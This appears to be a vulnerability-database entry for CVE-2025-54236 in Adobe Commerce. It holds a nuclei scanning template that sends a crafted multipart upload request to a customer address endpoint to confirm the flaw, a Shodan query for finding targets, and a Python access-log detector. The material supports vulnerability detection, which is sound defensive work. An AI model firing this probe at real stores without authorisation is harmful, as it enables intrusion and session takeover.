Adobe Commerce - Authentication Bypass

CVE-2025-54236
Early Release

Description

Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact to high. Exploitation of this issue does not require user interaction.

Severity

Critical

Published Date

October 26, 2025

Template Author

dhiyaneshdk, slcyber, johnk3r

CVE-2025-54236.yaml
id: CVE-2025-54236

info:
  name: Adobe Commerce - Authentication Bypass
  author: DhiyaneshDK,slcyber,johnk3r
  severity: critical
  description: |
    Adobe Commerce versions 2.4.9-alpha2, 2.4.8-p2, 2.4.7-p7, 2.4.6-p12, 2.4.5-p14, 2.4.4-p15 and earlier are affected by an Improper Input Validation vulnerability. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact to high. Exploitation of this issue does not require user interaction.
  impact: |
    Attackers can take over user sessions, compromising confidentiality and integrity of user data.
  remediation: |
    Update to the latest Adobe Commerce version.
  reference:
    - https://slcyber.io/assetnote-security-research-center/why-nested-deserialization-is-still-harmful-magento-rce-cve-2025-54236/?v=2
    - https://sansec.io/research/sessionreaper
  metadata:
    verified: true
    max-request: 1
    shodan-query: "X-Magento-Tags"
  tags: cve,cve2025,file-upload,intrusive,auth-bypass,kev,vkev

variables:
  form_key: "{{rand_text_alphanumeric(16)}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"
  marker: "{{randstr}}"
  base64: "{{base64(filename)}}"

http:
  - raw:
      - |
        POST /customer/address_file/upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Cookie: form_key={{form_key}}

        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Content-Disposition: form-data; name="form_key"

        {{form_key}}
        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ
        Content-Disposition: form-data; name="custom_attributes[country_id]"; filename="{{filename}}"
        Content-Type: text/plain

        {{marker}}
        ------WebKitFormBoundaryDNFoGI9h3cNjiBCQ--

        {
          "name": "{{filename}}",
          "full_path": "{{filename}}",
          "type": "text/plain",
          "tmp_name": "{{filename}}",
          "error": 0,
          "size": 11,
          "file": "/t/e/{{filename}}",
          "url": "{{RootURL}}/customer/address/viewfile/file/{{base64}}~~/"
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_any(body, "full_path","tmp_name","size","{{base64}}" )'
        condition: and
# digest: 4a0a0047304502203b0116b3e0f9f6686273970a19f4429bbf3b6041026bdcff884e7b565c5e03e3022100ebbe2fac2e525f8e44f000f4c8dd3d9ffa8da86c7e51b4d41ab4b80b2d6939ae:922c64590222798bb761d5b6d8e72950
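
A defender-side companion to the template above, added here as an example and not part of the nuclei template or its authors' code: it scans web access logs for the POST to /customer/address_file/upload that the template sends and records whether the server answered 200, the status the matcher requires. The combined log format, the name find_upload_probes and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed input: Apache/nginx combined log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
UPLOAD_PATH = "/customer/address_file/upload"      # endpoint the template POSTs to
VIEW_PREFIX = "/customer/address/viewfile/file/"   # URL shape shown in the template

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '192.0.2.10 - - [26/Oct/2025:10:00:01 +0000] "POST /customer/address_file/upload HTTP/1.1" 200 187 "-" "curl/8.5.0"',
    '192.0.2.10 - - [26/Oct/2025:10:00:02 +0000] "GET /customer/address/viewfile/file/YWJjZGU~~/ HTTP/1.1" 200 11 "-" "curl/8.5.0"',
    '198.51.100.7 - - [26/Oct/2025:10:05:00 +0000] "POST /customer/address_file/upload HTTP/1.1" 403 0 "-" "-"',
    '203.0.113.5 - - [26/Oct/2025:10:06:00 +0000] "GET /customer/account/login/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def find_upload_probes(lines):
    """Return per-client counters for every IP that POSTed to the upload endpoint."""
    stats = defaultdict(lambda: {"posts": 0, "accepted": 0, "viewfile_gets": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m["path"].split("?", 1)[0]  # ignore any query string
        entry = stats[m["ip"]]
        if m["method"] == "POST" and path.rstrip("/") == UPLOAD_PATH:
            entry["posts"] += 1
            if m["status"] == "200":  # the status the template's matcher keys on
                entry["accepted"] += 1
        elif m["method"] == "GET" and path.startswith(VIEW_PREFIX):
            entry["viewfile_gets"] += 1  # follow-up fetch of an uploaded file
    # Report only clients that actually hit the upload endpoint.
    return {ip: s for ip, s in stats.items() if s["posts"]}

if __name__ == "__main__":
    for ip, s in find_upload_probes(SAMPLE_LOG).items():
        print(ip, s)
```

Clients with a non-zero accepted count received the 200 response this template treats as a positive match, so those hosts are the ones to prioritise for patching and session review.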